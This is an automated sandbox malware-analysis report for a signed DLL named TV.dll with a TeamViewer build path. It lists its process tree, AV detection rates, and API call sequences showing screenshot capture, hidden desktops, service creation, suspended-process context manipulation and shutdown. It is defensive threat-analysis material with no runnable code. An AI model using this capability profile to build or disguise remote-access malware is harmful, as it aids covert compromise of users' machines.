Play interactive tour

Edit tour

Windows Analysis Report TV.bin

Overview

General Information

Sample Name:	TV.bin (renamed file extension from bin to dll)
Analysis ID:	483792
MD5:	a44f2649c82b35d42e6036d1c75e48c4
SHA1:	ee3b00701c97ed107b78ecbdf9d962f1508edc8e
SHA256:	760945429f7ea52c40c75a0fa0424d943e317ec48575c812545cc2c4be5b0510
Tags:	dllHartexLLCsignedsoldewornek
Infos:
Most interesting Screenshot:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Uses 32bit PE files

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to call native functions

Contains functionality to record screenshots

Contains functionality to delete services

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6240 cmdline: loaddll32.exe 'C:\Users\user\Desktop\TV.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6276 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6324 cmdline: rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6308 cmdline: rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6476 cmdline: rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: TV.dll	Virustotal: Detection: 32%			Perma Link
Source: TV.dll	ReversingLabs: Detection: 26%

Source: TV.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: TV.dll

Static PE information: certificate valid

Source: TV.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: rundll32.exe, 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.255852074.000000006ECAD000.00000002.00020000.sdmp, TV.dll

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA28B0 RtlZeroMemory,RtlZeroMemory,IsWindowEnabled,wsprintfA,IsWindowEnabled,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,		3_2_6ECA28B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,		3_2_6ECA2DF0

Source: TV.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: TV.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: TV.dll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: TV.dll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: TV.dll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: TV.dll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: TV.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: TV.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: TV.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: TV.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: TV.dll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: TV.dll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: TV.dll	String found in binary or memory: http://ocsp.comodoca.com0
Source: TV.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: TV.dll	String found in binary or memory: http://ocsp.digicert.com0O
Source: TV.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: TV.dll	String found in binary or memory: http://www.digicert.com/CPS0
Source: TV.dll	String found in binary or memory: https://sectigo.com/CPS0
Source: TV.dll	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA5A00 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_6ECA5A00

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA66E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,

3_2_6ECA66E0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,

3_2_6ECA9BD0

Source: TV.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,IsWindowEnabled,IsWindowEnabled,wsprintfA,IsWindowEnabled,IsWindowEnabled,wsprintfA,GetFileAttributesA,IsWindowEnabled,IsWindowEnabled,DeleteFileA,IsWindowEnabled,IsWindowEnabled,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,IsWindowEnabled,IsWindowEnabled,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,IsWindowEnabled,IsWindowEnabled,wsprintfA,IsWindowEnabled,IsWindowEnabled,IsWindowEnabled,IsWindowEnabled,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_6ECA5B40

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA3610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,

3_2_6ECA3610

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,IsWindowEnabled,IsWindowEnabled,RtlMoveMemory,IsWindowEnabled,IsWindowEnabled,PathRemoveFileSpecA,IsWindowEnabled,IsWindowEnabled,PathAddBackslashA,IsWindowEnabled,IsWindowEnabled,SetCurrentDirectoryA,IsWindowEnabled,IsWindowEnabled,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,IsWindowEnabled,IsWindowEnabled,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,IsWindowEnabled,IsWindowEnabled,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,IsWindowEnabled,IsWindowEnabled,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,	3_2_6ECA8510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAB2D0 RtlMoveMemory,NtFlushInstructionCache,	3_2_6ECAB2D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA2ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	3_2_6ECA2ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA18D0 NtProtectVirtualMemory,	3_2_6ECA18D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA14E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,	3_2_6ECA14E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA4EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,	3_2_6ECA4EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,	3_2_6ECAB0A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA2640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,	3_2_6ECA2640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAB270 NtResumeThread,NtClose,HeapFree,	3_2_6ECAB270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA8400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,	3_2_6ECA8400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA1C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,	3_2_6ECA1C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAAE20 NtOpenThread,	3_2_6ECAAE20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAAFC0 NtGetContextThread,NtSetContextThread,	3_2_6ECAAFC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAADE0 NtProtectVirtualMemory,	3_2_6ECAADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA19F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,	3_2_6ECA19F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAB1F0 NtSuspendThread,NtClose,	3_2_6ECAB1F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA7790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,	3_2_6ECA7790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA23B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,	3_2_6ECA23B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA2750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,	3_2_6ECA2750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	3_2_6ECA6D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAA500 NtQueryVirtualMemory,	3_2_6ECAA500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECAAD39 NtProtectVirtualMemory,	3_2_6ECAAD39

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA3700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,

3_2_6ECA3700

Source: TV.dll	Virustotal: Detection: 32%
Source: TV.dll	ReversingLabs: Detection: 26%

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA96D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,

3_2_6ECA96D0

Source: TV.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA3C60 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,

3_2_6ECA3C60

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\TV.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_6ECA5B40

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,

3_2_6ECA4E50

Source: classification engine

Classification label: mal48.winDLL@9/0@0/0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA6480 CoInitializeEx,CoCreateInstance,RtlZeroMemory,VariantInit,CoUninitialize,

3_2_6ECA6480

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,

3_2_6ECA3C60

Source: TV.dll

Static PE information: certificate valid

Source: TV.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: TV.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECAC101 push ecx; ret

3_2_6ECAC114

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,IsWindowEnabled,wsprintfA,IsWindowEnabled,wsprintfA,IsWindowEnabled,IsWindowEnabled,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,

3_2_6ECA44D0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,

3_2_6ECA37D0

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECAB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,

3_2_6ECAB0A0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA28B0 RtlZeroMemory,RtlZeroMemory,IsWindowEnabled,wsprintfA,IsWindowEnabled,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,		3_2_6ECA28B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ECA2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,		3_2_6ECA2DF0

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECAB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,

3_2_6ECAB0A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA3B60 SvcEntry,IsWindowEnabled,SetCurrentDirectoryA,RegisterServiceCtrlHandlerExW,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,SetServiceStatus,SetServiceStatus,ExitProcess,

3_2_6ECA3B60

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECAC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_6ECAC1E2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA5130 LogonUserW,GetLastError,CloseHandle,

3_2_6ECA5130

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA3220 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

3_2_6ECA3220

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,

3_2_6ECA6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6ECA8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,IsWindowEnabled,IsWindowEnabled,RtlMoveMemory,IsWindowEnabled,IsWindowEnabled,PathRemoveFileSpecA,IsWindowEnabled,IsWindowEnabled,PathAddBackslashA,IsWindowEnabled,IsWindowEnabled,SetCurrentDirectoryA,IsWindowEnabled,IsWindowEnabled,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,IsWindowEnabled,IsWindowEnabled,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,IsWindowEnabled,IsWindowEnabled,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,IsWindowEnabled,IsWindowEnabled,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,

3_2_6ECA8510

Source: C:\Windows\SysWOW64\rundll32.exe

